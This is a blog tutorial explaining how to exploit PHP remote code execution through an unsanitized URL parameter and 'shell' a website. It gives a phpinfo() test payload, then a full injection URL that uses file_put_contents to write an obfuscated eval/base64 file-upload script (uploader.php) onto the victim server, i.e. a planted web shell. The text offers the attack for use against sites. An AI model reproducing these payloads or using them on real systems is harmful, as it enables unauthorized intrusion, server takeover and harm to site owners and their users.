How to Shell Website With RCE Remote Code Execution

How to Shell Website With RCE Remote Code Execution

Add Comment , , , , , Edit

[RCE] REMOTE CODE EXECUTION TUTORIAL
How to Find RCE vulnerability ?

 RCE most commonly happens via unsanitized input on a website input,

 What Can We do With this vulnerability ?
We can execute any PHP code. Only common tags must start with <?php and ended with ?> Because it already, we insert Code Only such phpinfo();

Injecting Point ?

 For e.g you get site something like this -
http://mysite.com/includes/functions.php?products=

 So the parameter "products" is where we gonna inject our malicious code!

 To test the site it will become something like this -
http://mysite.com/includes/functions.php?products=phpinfo();


How To Shell the site with RCE Remote code execution ?
So if the code "phpinfo()" got executed it means boom the site is vulnerable to attack.
Now lets shell the site with some php builtin functions..

 We will use this function to shell the site - file_put_contents
& this Script Coded by Me! get the Script over here!

 Now lets execute over malicious code -

 http://mysite.com/includes/functions.php?products=file_put_contents('uploader.php', '<?php /* UPLOADER SCRIPT BY MKAY */ ?>
<?php eval('?>' . base64_decode('PD9waHAKLyogVVBMT0FERVIgU0NSSVBUIEJZIE1LQVkgKi8KJGZvcm0gPSAnPGZvcm0gYWN0aW9uPSInLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuJyIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCQk8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ic3ViIj48L2Zvcm0+JzsKJGRpciA9IGRpcm5hbWUoJF9TRVJWRVJbJ1BIUF9TRUxGJ10pOwppZighaXNzZXQoJF9QT1NUWydzdWInXSkpewoJZWNobyAkZm9ybTsKfQppZihpc3NldCgkX1BPU1RbJ3N1YiddKSl7CglpZihpc19maWxlKCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSkpewoJCWlmKEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpe2VjaG8gJzxhIGhyZWY9IicuJGRpci4gJy8nIC4gJF9GSUxFU1snZmlsZSddWyduYW1lJ10gLiAnIj48Yj5VcGxvYWRlZDwvYj48L2E+Jzt9Cgl9Cn0KLyogVVBMT0FERVIgU0NSSVBUIEJZIE1LQVkgKi8KPz4='));');
Boom over uploading script got uploaded! :D
Now the script will be uploaded to http://mysite.com/includes/

 now just type "uploader.php" where it has been uploaded,

For e.g - http://mysite.com/includes/uploader.php





SHARE

Mikail Khan

Hi. I’m Mikail Khan(Mkay), 1st a PHP and MySQL programmer plus developer and then, a young Tech Blogger from Pakistan who loves to read and write blogs.Feel free to ask, in-case you have any query regarding computers concat me here!.

  • Image
  • Image
  • Image
  • Image
  • Image
    Blogger Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )